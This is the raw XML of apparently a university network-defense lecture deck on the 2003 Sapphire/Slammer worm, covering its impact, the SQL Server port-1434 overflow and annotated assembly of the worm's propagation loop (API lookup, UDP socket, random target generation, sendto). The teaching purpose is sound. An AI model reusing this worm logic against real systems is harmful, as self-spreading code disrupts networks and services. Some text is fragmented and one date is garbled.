              <a:rPr lang="en-US" sz="1600" dirty="0"/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7458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Slammer Worm Insides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worm calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetTickCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> via the return value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> call, and adds eight bytes to its stack frame for later storage needs:.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GetTickCount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(), ESP=EBP-40h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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ecx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ecx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; [EBP-44h]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; [EBP-48h]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7957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Slammer Worm Insides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worm generates two permanent members of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sockaddr_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> structure. ECX=9A050002, which represents the first two members of the structure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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sockaddr_in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short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sin_family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u_short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sin_port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in_addr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sin_addr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char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sin_zero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[8];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dirty="0"/>
              <a:t>The first member is set to 2 (AF_INET), and the second is set to the network-order representation of 1434 (the port of the SQL resolution service). This 4-byte set is then saved to the stack frame:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2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9B040103h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2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1010101h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="9144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		; [EBP-50h]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6209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Slammer Worm Insides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worm then locates the 'socket' API call via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer stored in the ESI register. EBP-34h stores the address of the string literal "socket", while EBP-40h stores the base address of the ws2_32.dll library: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lea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[ebp-34h]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		; [EBP-54h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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[ebp-40h]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		; [EBP-58h]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	; Procedure exit: ESP=EBP-50h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8050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Slammer Worm Insides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worm then creates a UDP socket for use in propagation. The socket is a User Datagram Protocol socket, and the function address is pulled from the return value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. The worm then saves the socket descriptor to its stack frame:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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push 11h 		; [EBP-54h] IPPROTO_UDP - User Datagram Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push 2 		; [EBP-58h] SOCK_DGRAM - Datagram socket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2 		; [EBP-5Ch] AF_INET - Internet address family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			; Procedure exit: ESP=EBP-50h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			; [EBP-54h]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lea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[ebp-3Ch]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			; [EBP-58h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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[ebp-40h]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			; [EBP-5Ch]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	; Procedure exit: ESP=EBP-54h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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worm XORs the EBX register with 0xFFD9613C. The OR instruction was most likely intended to be an XOR. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="85725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ebx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9175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Slammer Worm Insides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Propagation: generates a random number based on the seed stored at EBP-4Ch, and then replacing it with the value in EAX at the end of the procedure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PRND:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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[ebp-4Ch] 	; EAX=Random seed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lea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eax+eax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*2] 	; ECX=EAX*4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lea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eax+ecx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*4] 	; EDX=ECX*4+EAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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shl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4 		; EDX=EDX&lt;&lt;4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		; EDX+=EAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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shl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8 		; EDX=EDX&lt;&lt;8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sub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		; EDX-=EAX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lea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eax+edx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*4] 	; EAX+=EDX*4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		; EAX+=EBX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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[ebp-4Ch],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	; Replace old seed w/ new one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3419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Slammer Worm Insides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sendto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> called: 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WINSOCK_API_LINKAGE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WSAAPI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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sendto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SOCKET s,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char FAR *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flags,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sockaddr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FAR * to,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tolen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/>
              <a:t>The parameters are passed as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s = EBP-54h: This is the socket descriptor returned by the prior call to socket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = [EBP+3]: This is the buffer that was sent to the SQL server to cause the overflow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 376: This tells the function that the body of the packet is 376 bytes in length.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>flags = 0: This specifies that no special behavior is to be applied to the outbound packet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to = EBP-50h: This is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sockaddr_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> structure mentioned earlier. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sin_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> member of the structure is set to the number returned from PRND.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tolen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 10h: This tells the function that the structure is exactly 16 bytes in length.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6552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Slammer Worm Insides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10h 		; [EBP-58h]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sockaddr_in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lea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[ebp-50h]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		; [EBP-5Ch]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=Target address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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ecx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		; [EBP-60h]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=Send flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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cx, 178h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		; [EBP-64h]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=Packet length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lea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[ebp+3]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		; [EBP-68h]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=Exploit address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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[ebp-54h]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		; [EBP-6Ch]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=socket descriptor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		; Procedure exit: ESP=EBP-54h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The worm then continues replication by jumping back into the pseudo-random number generator:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="40005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short PRND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6682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7B55DC7-B95B-4807-B808-1E7A81E0F4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67019-40B7-405C-98B7-75F3216AFF7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9" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2785A2B3-FCF4-4D59-9841-12917D91B27A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725683" y="871606"/>
            <a:ext cx="7893050" cy="5114787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr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Please attribute Dr. Jim Alves-Foss and Dr. Jia Song, University of Idaho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sz="1600" dirty="0"/>
              <a:t>Except where otherwise noted, this work is licensed under https://creativecommons.org/licenses/by-nc-sa/4.0/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Not withstanding the non-commercial license terms, non-profit educational institutions are granted a non-exclusive license to adapt and use this material, with attribution.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Creative Commons and the double C in a circle are registered trademarks of Creative commons in the United States and other countries. Third party marks and brands are the property of their respective holders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Project sponsored by the National Security Agency under grant Number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>H98230-17-1-0199. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>United States Government is authorized to reproduce and distribute reprints notwithstanding any copyright notation herein.</a:t>
            </a:r>
          </a:p>
          <a:p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4460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Outcomes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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Upon completion of this lesson:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Students will be able to describe the basic attack technique used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the Sapphire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Slammer worm.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B1163B0-19D9-4859-8B88-CD4B646011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985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B4D30A-1B90-488C-BB6A-78C1FD5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Sapphire/Slammer Worm Attribution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079159-135B-4E15-BF78-FF37FEE53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Attribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“The Spread of the Sapphire/Slammer Worm”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.caida.org/publications/papers/2003/sapphire/sapphire.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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See also:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Malware FAQ: MS-SQL Slammer”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.sans.org/security-resources/malwarefaq/ms-sql-exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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424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B61177-A86A-46CE-834E-10A1A9E2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Slammer Worm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585EFB-8988-4BBE-B77B-7547B9E93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Sapphire/Slammer Worm was the fastest computer worm in history. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>January 235, 203</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As it began spreading throughout the Internet, it doubled in size every 8.5 seconds. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It infected more than 90 percent of vulnerable hosts within 10 minutes.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infected more than 75,000 hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How did it work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploited a buffer overflow vulnerability in computers on the Internet running Microsoft's SQL Server or MSDE 2000 (Microsoft SQL Server Desktop Engine). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patch was released almost 6 months earlier.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9867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289E4D-324D-402F-910C-B992E197E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Slammer Worm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D7FB48-691E-45F5-AA10-E6B84A6F2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Attack payload was only 375 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Did not have malicious content, just spread a copy of itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many Bank of America ATMs would not work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global internet slowdown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interfered with 911 calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many cancelled flights</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Over $1Billion in US. Dollars of damage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>one estimate lost productivity in first 5 days worldwide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>one estimate of cost of cleanup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cnet.com/news/counting-the-cost-of-slammer/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 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8102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Slammer Worm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Based on analysis of Matthew Murphy and Riley </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hassell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eeye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initial vulnerability reported David Litchfield</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compromises SQL Server/MSDE 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When server is infected, worm sets up a stack frame with information needed for propagation, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetTickCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> API (for random seed generation)and other WinSock APIs. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LoadLibraryA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> APIs by searching sqlsort.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is a single packet infection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3774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MS SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Port 1434 is assigned to MS SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tests of this undocumented interface showed that if single byte sent ‘0x02’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ServerName:SERVER_NAME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InstanceName:MSSQLSERVER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IsClustered:No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Version:8.00.194 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>np:\\SERVER_NAME\pipe\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\query </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via:SERVER_NAME,0:1433 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Version number wrong, other commands show 8.00.608 for SP2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If SQL server is “hidden” it listens to port 2433, but this port is still active</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tests found that not all inputs handled, testing values ‘0x00’ to ‘0xFF’ ‘0x08’ server died</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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165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3200" dirty="0"/>
              <a:t>code is something like..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if(FIRST_BYTE &gt; 9)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g9;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else if (FIRST_BYTE == 9)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e9;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else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FIRST_BYTE = FIRST_BYTE - 2;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if(FIRST_BYTE &gt; 6)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should never get here!!!!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}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cmdptr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cmdptr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+ 4 * FIRST_BYTE;  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cmdptr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61296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PP_C5MODULES_CC_LICENSE_STANDARD" val="h8ZNMAfs"/>
  <p:tag name="ARTICULATE_USED_PAGE_ORIENTATION" val="1"/>
  <p:tag name="ARTICULATE_USED_PAGE_SIZE" val="1"/>
  <p:tag name="ARTICULATE_PRESENTATION_ID" val="331246"/>
  <p:tag name="ARTICULATE_PROJECT_CHECK" val="0"/>
  <p:tag name="TAG_BACKING_FORM_KEY" val="16519558-k:\cnap\netsec course\lectures\module_1\lesson 1 networking overview.pptx"/>
  <p:tag name="ARTICULATE_PRESENTER_VERSION" val="8"/>
  <p:tag name="ARTICULATE_PROJECT_OPEN" val="0"/>
  <p:tag name="ARTICULATE_SLIDE_COUNT" val="2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03"/>
  <p:tag name="ARTICULATE_USED_LAYOUT" val="2"/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3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9"/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P_C5Modules_CC_License_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C5Modules_CC_License_standard" id="{F0FA9D47-06A1-4F86-A3DE-945BA88B3B0E}" vid="{A7340899-09C2-4C21-8394-A4D30A56A3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C5 Modules</Template>
  <TotalTime>2705</TotalTime>
  <Words>1676</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>305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PP_C5Modules_CC_License_standard</vt:lpstr>
      <vt:lpstr>Module: Network Defense</vt:lpstr>
      <vt:lpstr>Network Defense Module</vt:lpstr>
      <vt:lpstr>Learning Outcomes</vt:lpstr>
      <vt:lpstr>Sapphire/Slammer Worm Attribution</vt:lpstr>
      <vt:lpstr>Slammer Worm Speed</vt:lpstr>
      <vt:lpstr>Slammer Worm Notes</vt:lpstr>
      <vt:lpstr>Slammer Worm Analysis</vt:lpstr>
      <vt:lpstr>Understanding SQL Server</vt:lpstr>
      <vt:lpstr>Understanding SQL Server</vt:lpstr>
      <vt:lpstr>Understanding SQL Server</vt:lpstr>
      <vt:lpstr>Understanding SQL Server</vt:lpstr>
      <vt:lpstr>Function Calls and Buffer Overflow</vt:lpstr>
      <vt:lpstr>Slammer Worm</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Stack </vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>Slammer Worm Insides</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>University of California at Davis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Bishop</dc:creator>
  <cp:lastModifiedBy>Song, Jia (jsong@uidaho.edu)</cp:lastModifiedBy>
  <cp:revision>253</cp:revision>
  <cp:lastPrinted>2016-07-18T16:40:10Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-07-03T20:12:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-24T20:53:39Z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https://vandalsuidaho-my.sharepoint.com/personal/jimaf_uidaho_edu/Documents/CNAP/Cybersecurity-Curriculum-Templates/03. Module Template and Formatting Guidelines/02. Slide Template</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ArticulateUseProject">
    <vt:lpwstr>1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ArticulateProjectVersion">
    <vt:lpwstr>8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ArticulateGUID">
    <vt:lpwstr>2925794F-5522-4D9F-91B7-B0EEE976CE32</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ArticulateProjectFull">
    <vt:lpwstr>G:\CNAP\Deliverables\NetSec\Module_3 Network Defense\SlammerWorm.ppta</vt:lpwstr>
  </property>
</Properties>
</file>